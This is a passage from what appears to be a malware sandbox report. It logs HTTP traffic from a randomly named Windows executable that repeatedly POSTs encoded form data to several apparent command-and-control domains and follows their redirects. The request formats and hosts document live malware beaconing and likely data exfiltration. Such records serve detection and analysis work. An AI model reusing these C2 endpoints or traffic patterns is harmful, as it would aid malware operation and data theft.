                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  38 | 192.168.11.20 | 49794 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:19.641379118 CEST | 837 | OUT | POST /qo4k/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.platinumkitchens.info
                                                                                  Origin: http://www.platinumkitchens.info
                                                                                  Referer: http://www.platinumkitchens.info/qo4k/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=64iNzW8jYbN7359wUIue3V8an27/vFbfgjwVhWbz70cR2PZcBJzuhYFhhwamA2IohGjWBVRUvU4zk98htgogDUrFeDEB0hPfoe3L9qYa+wUqt6V4WWFnlPoZyhRVk5MOQBo9sFO7vpp+wST9VbH/EQA2YjyXP7tWBuAuXUW9B4YciYSg8XEHQG+FT/liJ/0WvQ==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  39 | 192.168.11.20 | 49795 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:22.298674107 CEST | 857 | OUT | POST /qo4k/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.platinumkitchens.info
                                                                                  Origin: http://www.platinumkitchens.info
                                                                                  Referer: http://www.platinumkitchens.info/qo4k/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=64iNzW8jYbN72YNwXv6e118FpW7/6Vblgj8VhT7j6GoR2vpcAMPus4FhmAbsNWIZhHepBUtUvVczk4Aht38/MkrHHzED7BPfoe3L9u08+wMqtKl4V3F4vvoa1hRVzpMKQBolsBPWvtZ+wTj9Vuz4NQAKXDzzMINcKMoPSWGRNqw+jOD6hlwjTVi3XPcKL91NyfNSjZ5+Boc5ZYli7Skv6pc=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  40 | 192.168.11.20 | 49796 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:24.939691067 CEST | 1289 | OUT | POST /qo4k/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.platinumkitchens.info
                                                                                  Origin: http://www.platinumkitchens.info
                                                                                  Referer: http://www.platinumkitchens.info/qo4k/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI= [TRUNCATED]
                                                                                  Sep 25, 2024 09:57:24.939769983 CEST | 6717 | OUT
                                                                                  Data Ascii: AsWcEEQXDM3+gRZpq2FwchJSLoHdZn3C5bVN4sEFUr+5C3oEjHhYrcO0kJMX/bIc+DoaTM9K7K/tfHyKLbAfAsoduVF6BAfa46v5gdpwNBQa4blZey/CECRiBLc1/SZUKP3yjLlCI7chNc1K9ZUEKb/+Jc8MCu+gcLXU5qJFt8q0ErPXNjm38BQEzjQPcYboCBKKpM2xE7LhFx48kwO2EUmCLGS4J0/WeT2zhENUHLKUHBYEnqg


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  41 | 192.168.11.20 | 49797 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:27.576461077 CEST | 555 | OUT | GET /qo4k/?O4bP=9dRH6ZfHbJX&Xb3xI=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.platinumkitchens.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:57:27.682461977 CEST | 398 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:57:27 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O4bP=9dRH6ZfHbJX&Xb3xI=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM="}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  42 | 192.168.11.20 | 49798 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:32.927434921 CEST | 804 | OUT | POST /yyvd/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dhkatp.vip
                                                                                  Origin: http://www.dhkatp.vip
                                                                                  Referer: http://www.dhkatp.vip/yyvd/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=Ao0pCCEh0VO3HyU7fB/ziGJQ7udX8+kc8nJy2Lb733to7pUp291ZmCICl6uEKaBqdGybY3seJgyfWHpj95lXNb9w+fl6DzNKf8kfhgYCfFZaGy1haSA3ktaho/y44KCYkGAJ1S0cs8HkTlOLXqSD3+TDtaUftySdy0sk+TfHHbPq9yu/LqiMYzlWah14j5Tj4w==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  43 | 192.168.11.20 | 49799 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:35.562297106 CEST | 824 | OUT | POST /yyvd/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dhkatp.vip
                                                                                  Origin: http://www.dhkatp.vip
                                                                                  Referer: http://www.dhkatp.vip/yyvd/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=Ao0pCCEh0VO3GSk7PSnzlmJf+udX3ekY8nFy2PK23EJo7JkpxM1ZqiICtauYH6B9dG3kYyMeJkifWCVj9vtUML9u1/lCeDNKf8kfhgMkfFBaHDlhb200ntaip/y4paDwkGAn1Toms6DkTgKLW7SCguSIg6VarhvjpBxS4UvJCJ6WxE/lWYWobg5keRMQh7S4lzfqzH6IEuWJDrslqtXfm5w=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  44 | 192.168.11.20 | 49800 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:38.203566074 CEST | 2578 | OUT | POST /yyvd/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dhkatp.vip
                                                                                  Origin: http://www.dhkatp.vip
                                                                                  Referer: http://www.dhkatp.vip/yyvd/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=Ao0pCCEh0VO3GSk7PSnzlmJf+udX3ekY8nFy2PK23EBo66sp2fNZriICn6ubH6A/dHTgYyIOJi+fEwNjpKNUHL9uovl5DzNTf80bhgckfFBaHBNhYiA0htaho/z34KDLkGIR1TdbtL/kSAaLap6C/eSKl6V8rhjGpAYt4UyUCOGW7CG9RpqUYSwuCRBot6qonR/V+WyfOZGdKYMlvO3079Iw8aBKouQ+NxSSv7oNGtdYb4CFy8GcUf+lgdZ7Es/QfCjnFzpE6zmWJCzS4LAjWkVLZhs/N0c6vFS9sZiT3Xq1vBaxWrP+Z8GM4uxcKA6RIAhLje4VRXAO4D9kWTPBR07/BVebi1iUUbnYh8xwYnBrAgc2WWHcfNcUA3X/wJZt2vcAAFHNEGef/k+kDnX9GT6lppqfiYfGdi70NcwXY8DedkAU+i5qUUrWAyaLIwJsjgakZijy71x8BsqiFCEhul3POr9OBDCbarvidvhVnWbTX0xadEuHa9wCPpbO5fJBliycvkz3BcZZtDVgyY2+5IqhzWlFQ7S8ShlNrotv7P3bazgn9Z2JEz4pZQ9JFau8Cozgm3kfqUSyQqYUJh8SjoZCUZbFUhx9cAilEm8QS9vmZAPEfVhJUay1nEDn2YgsTL4tz7I3rQb+ivbMyrs7IvrZ/Aa+CHfqxvlaBlJPEaRSz/TnEObVyVebZi4oYYKgOa8AcndQuA7l3c1la/J7pyTj7w+N1wfIIMKshjDmnbqwMnT1LH817smTLSKXnuiZUTbo8dh3dEnQxRXdTT9MNSasqSf9uBjDY0x6dkNM5ZwSnffUC0xt1MOCioOmP7AFpY3VviETWfoH2KhEQk+VQfQMWPVHEvsfdDixLl+vdfOdPX+AJlbRsAGQpe4r8uXbSMS1tG360nhxk0BT9MZ3mxWo+fULGqqMhsavQak6kYCjrSicDl8nIXy61lcN8BkkGITQ/6NcToGCkmdACwuarM+/8dIZmL5dCmTCVX5yDNfF2m [TRUNCATED]
                                                                                  Sep 25, 2024 09:57:38.203613043 CEST | 2578 | OUT
                                                                                  Data Ascii: uNchzEFDPpf1Qad7tO+CRvvV0f+l36MzXHs24Qr5dCvG/UagdY/t2ufHTpqQGu0kFFPQG+4CyTjvE6spDVPj34IE+ZeiG150aSfdu6us0VKF2TjCRUxOYO/vH9IwAA6+EyO6o2Yikwi5A1MQlaI+G6Rebh4kKSUhAS/4KMXORE5PtJ3OsH8/BU/kPSrKnfVXZQqyztRw6NR5sLEVJozs9U2VF5GugeI3mluwWMZigEUPr7Y0GJZ
                                                                                  Sep 25, 2024 09:57:38.203641891 CEST | 2817 | OUT
                                                                                  Data Ascii: 96eCizAtQ6R17znTy25NMkt/ul6pxgBtaaGucApw0NkvwKndehlqaejXL+PS5HVIM1TmNxkY3g0tkAjqU6WxB7lZvNSSE7PkzlVbV1qimt6Cwtshz7VrDlNJHSdA/wOMYzdB69N4XU/lwv0uiK4LRsmHS31yxYRQVgY4WbbCqjBnB8vYzvh1TFu8npXcNpXDh/n/9KKpDP/b4RMxgBzA2fjjIiXbAKSJZ1NM3gEEeYYMGt6HzLe


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  45 | 192.168.11.20 | 49801 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:40.843882084 CEST | 544 | OUT | GET /yyvd/?Xb3xI=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dhkatp.vip
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:57:40.948753119 CEST | 398 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:57:40 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  46 | 192.168.11.20 | 49802 | 103.21.221.4 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:46.519728899 CEST | 840 | OUT | POST /iydt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tempatmudisini01.click
                                                                                  Origin: http://www.tempatmudisini01.click
                                                                                  Referer: http://www.tempatmudisini01.click/iydt/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=OcHLqbGcDYEKrCNWRAarwXHtD4kmPOQ1h5MueUyg60ICPO70iVoWCItEtu8IiVp6Ayt2w/fMwNO+44s5KcrsMoZxEtjPL5UlYOBJBylNurgR0jn4zmBmu2PRjd6ch806vRKydnb1PAYWZsGwSaZqNEYJzXuAhzKBG7Q0dO/m1WOXNGWCu8FljPoDlQVpZB63fg==
                                                                                  Sep 25, 2024 09:57:47.215883970 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  x-powered-by: PHP/7.4.33
                                                                                  x-litespeed-tag: 894_HTTP.404
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                  x-litespeed-cache-control: no-cache
                                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                  content-length: 11547
                                                                                  content-encoding: br
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 25 Sep 2024 07:57:47 GMT
                                                                                  server: LiteSpeed


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  47 | 192.168.11.20 | 49803 | 103.21.221.4 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:49.377686977 CEST | 860 | OUT | POST /iydt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tempatmudisini01.click
                                                                                  Origin: http://www.tempatmudisini01.click
                                                                                  Referer: http://www.tempatmudisini01.click/iydt/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=OcHLqbGcDYEKqhFWShar23HuA4kmV+Q5h5QueVmO6AkCKfL0jRcWBItE5+9Cs1phAyxUw63MwLi+49Q5KNrrPYZzPNjJEZUlYOBJByx3ur4R0z34yCdlymPOid6cl802vRKcdlvPPFcWZt2wSI9rDEYD3XvRwwbjJ/5DZpihsFGgFwHYzOxBgc0xhgsBbD7sCgBjic5FQd3RbjL1uV+XL48=
                                                                                  Sep 25, 2024 09:57:50.075261116 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  x-powered-by: PHP/7.4.33
                                                                                  x-litespeed-tag: 894_HTTP.404
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                  x-litespeed-cache-control: no-cache
                                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: br
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 25 Sep 2024 07:57:49 GMT
                                                                                  server: LiteSpeed


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  48 | 192.168.11.20 | 49804 | 103.21.221.4 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:52.263336897 CEST | 2578 | OUT | POST /iydt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tempatmudisini01.click
                                                                                  Origin: http://www.tempatmudisini01.click
                                                                                  Referer: http://www.tempatmudisini01.click/iydt/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:57:52.935847998 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  x-powered-by: PHP/7.4.33
                                                                                  x-litespeed-tag: 894_HTTP.404
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                  x-litespeed-cache-control: no-cache
                                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: br
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 25 Sep 2024 07:57:52 GMT
                                                                                  server: LiteSpeed


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  49 | 192.168.11.20 | 49805 | 103.21.221.4 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:57:55.139872074 CEST | 556 | OUT | GET /iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tempatmudisini01.click
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:57:55.746186018 CEST | 529 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  x-powered-by: PHP/7.4.33
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  x-redirect-by: WordPress
                                                                                  location: http://tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&O4bP=9dRH6ZfHbJX
                                                                                  x-litespeed-cache: miss
                                                                                  content-length: 0
                                                                                  date: Wed, 25 Sep 2024 07:57:55 GMT
                                                                                  server: LiteSpeed


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  50 | 192.168.11.20 | 49806 | 133.130.35.90 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:02.025504112 CEST | 807 | OUT | POST /qwk1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.komart.shop
                                                                                  Origin: http://www.komart.shop
                                                                                  Referer: http://www.komart.shop/qwk1/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:02.308358908 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                                                  content-encoding: gzip
                                                                                  content-type: text/html
                                                                                  date: Wed, 25 Sep 2024 07:58:02 GMT
                                                                                  etag: W/"66d6a4ca-2b5"
                                                                                  server: nginx
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 454
                                                                                  connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  51 | 192.168.11.20 | 49807 | 133.130.35.90 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:04.830764055 CEST | 827 | OUT | POST /qwk1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.komart.shop
                                                                                  Origin: http://www.komart.shop
                                                                                  Referer: http://www.komart.shop/qwk1/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:58:05.105915070 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                                                  content-encoding: gzip
                                                                                  content-type: text/html
                                                                                  date: Wed, 25 Sep 2024 07:58:04 GMT
                                                                                  etag: W/"66d6a4ca-2b5"
                                                                                  server: nginx
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 454
                                                                                  connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  52 | 192.168.11.20 | 49808 | 133.130.35.90 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:58:07.624305010 CEST | 2578 | OUT | POST /qwk1/ HTTP/1.1
